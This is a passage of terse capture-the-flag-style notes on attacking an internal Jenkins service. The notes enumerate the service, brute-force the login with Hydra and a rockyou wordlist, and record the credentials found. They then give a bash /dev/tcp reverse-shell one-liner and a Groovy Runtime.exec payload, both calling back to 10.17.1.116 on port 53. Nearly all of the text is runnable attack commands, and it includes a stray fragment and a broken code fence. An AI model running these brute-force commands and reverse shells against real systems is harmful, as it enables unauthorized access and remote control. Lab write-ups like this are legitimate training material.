aubreanna@$TARGET_IP ```  ### Numerate Internal service  Default ``` admin password ``` fail  Exploit not found Jetty 9.4.30.v20200611 information disclosure -> fail Attempt Brute force login  ``` /j_acegi_security_check j_username=meow&j_password=meowpass&from=%2F&Submit=Sign+in ``` Hydra ``` hydra -l "admin" -P rockyou.txt $TARGET_IP http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password 選擇 Repo ``` ``` hydra -l "admin" -P rockyou.txt 127.0.0.1 -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -v -t10 ```  login: admin password: spongebob     Attempt ``` bash -i >& /dev/tcp/10.17.1.116/53 0>&1 ```   ``` r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.17.1.116/53;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ```   root: